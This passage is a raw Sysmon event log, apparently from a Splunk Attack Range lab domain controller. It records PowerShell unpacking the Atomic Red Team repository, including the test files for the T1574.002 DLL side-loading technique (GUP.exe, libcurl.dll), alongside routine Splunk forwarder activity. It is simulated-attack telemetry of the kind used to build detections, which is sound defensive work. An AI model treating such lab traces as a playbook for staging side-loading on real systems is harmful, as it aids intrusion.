23542300x800000000000000024539Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:55.185{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=1AC6445ACED2C235776A4B8CCA3B00D8,SHA256=8CFACE90189749842AC35BDCAA5514A4FF41E2B3123B860867B534ACB2006B79,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000024538Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:08:55.170{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1574.002\bin\libcurl.dll2021-06-23 21:08:55.170 11241100x800000000000000024537Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localEXE2021-06-23 21:08:55.138{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomics\T1574.002\bin\GUP.exe2021-06-23 21:08:55.138 23542300x800000000000000024611Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:56.966{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=141CF113BA63589A6C4E3CF18B7B7B13,SHA256=ED8C61E81FF757CACACC977BAE0F767166EB77CB089780BA53184FEA0D8657C0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000024610Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:56.935{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A2E8-60D3-2206-00000000CF01}5096C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024609Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:56.935{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024608Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:56.935{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024607Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:56.935{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024606Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:56.935{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024605Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:56.935{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A2E8-60D3-2206-00000000CF01}5096C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000024604Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:56.935{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A2E8-60D3-2206-00000000CF01}5096C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000024603Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:56.936{4DB9351A-A2E8-60D3-2206-00000000CF01}5096C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000024602Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:56.701{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\master.zipMD5=113A1E240FFCB77AEDDDCE8D8C846CB4,SHA256=71129000804D77050ED444F3627130C2E1B27E55D44D6580905829B5305DE621,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024601Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:56.623{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\README.mdMD5=4C8C7075038F94E53432D8B97FB9940F,SHA256=EF08241507A912B90DFC99D9E13D007B1A08118349098C9E80064B0EF52B362B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024600Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:56.623{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\LICENSE.txtMD5=DDA4F30CDD84D94A82586B61071F6AE3,SHA256=65AF6027045D23175366EAB50E460AB3EE7790E591CB84CC32C78AC63A4C90E1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024599Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:56.623{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\Gemfile.lockMD5=AAE14FD5A8CBB9263C5936AA6416E778,SHA256=D82923D46C4C7FF91842CA2F05E83B105122AEED72C8970B49BD079996E10838,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024598Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:56.623{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=686CC76DBC301264E476A5843A5E9A03,SHA256=2B35D6BD7C1096828C434FA0646DCC71FD6EE885BD6B367E967A18904E87E9B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024597Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:56.513{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\GemfileMD5=941AF0BA561B616259448F885700C638,SHA256=E5A60369F1C35923A4C0E570BBB8967B794819ACE8AAF6AD9BD91FD918C80498,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024596Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:56.513{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\CODE_OF_CONDUCT.mdMD5=9D8AA52E6E18619003AAAE0FDC654B28,SHA256=F6FF96921867F34D69D952212E668C5BB65680DD9EA3A11F032EBA167171A0B0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024595Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:56.513{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomic-red-team.gemspecMD5=65D4E2F08542EA1D8B17DEE14EBCBF37,SHA256=23BE4B945AC378AE66C330D5C06687F072127C6B232EAC5AAF699FE0A394C8B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024594Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:56.513{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\.gitignoreMD5=3450F55E72CA8D93D834739D7AC24640,SHA256=20453D100D48172D48B148ADB9BB5322EC1446C46DFF8BB01C044FA58841D920,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024593Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:56.513{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\docs\_config.ymlMD5=210979D7CC3A3C844AC15BFC91E9A82E,SHA256=BD94FA6D171451A2F47B08F891FAE2E103D743F7F95C887412AED05C2E9AD287,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024592Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:56.513{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\docs\use-cases.mdMD5=1C7BD644DA156905CC219CBAC3EAC149,SHA256=9E88C8A8141317A462C195231F0496D1531D923327A026F63D65E2E0863FFB04,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024591Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:56.513{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\docs\testing.mdMD5=27D11006ED000D61CE3152D747AA35B0,SHA256=8BFD3184F5FCF09202330A91E2EE6A968F2C4ED133875141EB1E9654325B778E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024590Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:56.513{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\docs\roll-the-dice.mdMD5=983D7F1F3F21C0D6476BF90EC9FB8093,SHA256=24746ECE198C8374264BC5BAF4A06197BF26613BD41152A316D2B07EA61E76B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024589Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:56.513{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\docs\related.mdMD5=873E62FCA9A033130551499A2465E039,SHA256=255A77114E6F3887486EA223EAA19A4E129C15CB8F89AD0CFCF53E121CE58EFE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024588Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:56.513{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\docs\maintainers.mdMD5=EB890E45A63A9661F01778A870BB4C75,SHA256=800E8B59C3C50AE7752C132216BDB6AE311EFD7FD076BE83F2B53B1DD680510F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024587Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:56.513{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\docs\index.mdMD5=0D5543BDF847F917D8F2B516C65CFA71,SHA256=0C529979657970F3454E5B0C74C34FDD6460A3B82683085F451AC7E193FA875F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024586Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:56.513{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\docs\contributing.mdMD5=B9003EF367E9E34D67289C04668FD7D5,SHA256=FDEF954FD53ABF1D12E898FF2A451E91432F8DE419685595E7597D17DBDD43CC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024585Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:56.498{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\docs\CNAMEMD5=8B781CA0FEBF7CD2FE8C97B1EA32F1DF,SHA256=C045076E3858BB056CA310E6EE5759E26EBD8F5F9BEAB5487E82C18EE3657D48,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024584Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:56.498{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\docs\apis.mdMD5=F70A661CE51EF1B2EAE8C7CD0F367937,SHA256=438E3B13D7FD573AA9D5144F489FB70CD2C14E985C74D5D832610804554E008A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024583Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:56.498{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\docs\_layouts\default.htmlMD5=BDC3937D27D267430C4A41DF9F4FD3A8,SHA256=EE46E8888B62DB5EC1E35764A1BD0A9DC977CBD23E0D19878B26CE873EB69FB8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024582Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:56.498{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\docs\assets\javascripts\roll-the-dice.jsMD5=D54FD27E3CBEF0CF2C7E7EFE35EE6926,SHA256=50AB02E9479A1FB90EB440B49DE0F92608CB41A07812BDD5D36741BEFD30E604,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024581Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:56.498{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\docs\assets\images\technique-md-example.pngMD5=6120E4706204EF49170AD1C71F17E0C5,SHA256=5F8B02B964A3674E7D57B3CDFB8642734AFFF5E77FF27087CCA9F630D137A744,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024580Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:56.498{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\docs\assets\images\list-of-tests.pngMD5=81C9B2AE31DF5858273D5C0EB4B3322C,SHA256=E3BAD9ED15BD2597687A1C4ABF0FF497BBDE240252696C342B8B2CBE9748CAEF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024579Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:56.482{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\docs\assets\images\favicon.pngMD5=8B0CF4BF6567F10C19F7B2AD819934E3,SHA256=781056FB03CF06B1EEDCA032606B5DBACFAA77B21742AE1CBA5951AD53B3597D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024578Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:56.482{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\docs\assets\css\style.scssMD5=450FEC9901CCCC1497E8E7DE32AD2243,SHA256=3228F07EC8000FBBFD23D70FC1DAD4A78FFC6CBB57D078D2B791A2569CC3B9E8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024577Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:56.482{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\bin\validate-atomics.rbMD5=1BFA06A740179BB9BF6E5B93E337061F,SHA256=36E960538A189FCF3B829D37CE4E7DAC7F8F9CBF0260757EB57CFDB59A87CC7B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024576Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:56.482{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=56CA782BD8DA4D81994DDEB4AB13C67B,SHA256=D27B30350C7FA435CA06EA1767BE75C94F01171D72E097A89FF884E51728DB1E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024575Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:56.482{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\bin\new-atomic.rbMD5=5F3E55769D07E098C7DBC8BE12A7C71A,SHA256=B86E046B7DD3AA1D675AED981802513263B3902C2F26B827B1671D5B1261E95D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024574Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:56.482{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\bin\generate-guids.rbMD5=F9367D3F2E5E97A0DF032EDB7B7898A9,SHA256=8F8E2B7465FB26BDE3D48F95C8B9C12E75D481BD8577D054D11D699422AFF8E2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024573Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:56.482{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\bin\generate-atomic-docs.rbMD5=C058EE5CEDDBEF50434F0992A6912000,SHA256=39803961E8A1616EB0058ED50C0C786D97E1ADAB0526C0E1BDB25D9BBA1BBC72,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024572Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:56.482{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomic_red_team\spec.yamlMD5=EAFBE6F0B89D9C940539624A5C073243,SHA256=BF452F07BE655733583671271B3837FA16EB52DB6EC4B5CA927C61C170755194,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024571Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:56.482{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomic_red_team\enterprise-attack.jsonMD5=1529270E72BB9F28707FB4F24EE52371,SHA256=3B084E1B504FC18DCF72F8A930E3D276EEF1395BAE255B4FD0C8E4B9B286BC52,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000024570Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:56.373{4DB9351A-9DDD-60D3-0D00-00000000CF01}9046632C:\Windows\system32\svchost.exe{4DB9351A-9DDD-60D3-1100-00000000CF01}436C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024569Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:56.373{4DB9351A-9DDD-60D3-0D00-00000000CF01}9046632C:\Windows\system32\svchost.exe{4DB9351A-9DDE-60D3-1600-00000000CF01}1292C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000024568Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:56.341{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-master\atomic_red_team\attack_api.rbMD5=8168663E485A4DC3476514864634A463,SHA256=75CDAD6F1810DBE6C2C007301BEBDB9687AE3C5F66896B7207AE60A95AA5AC8B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024567Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 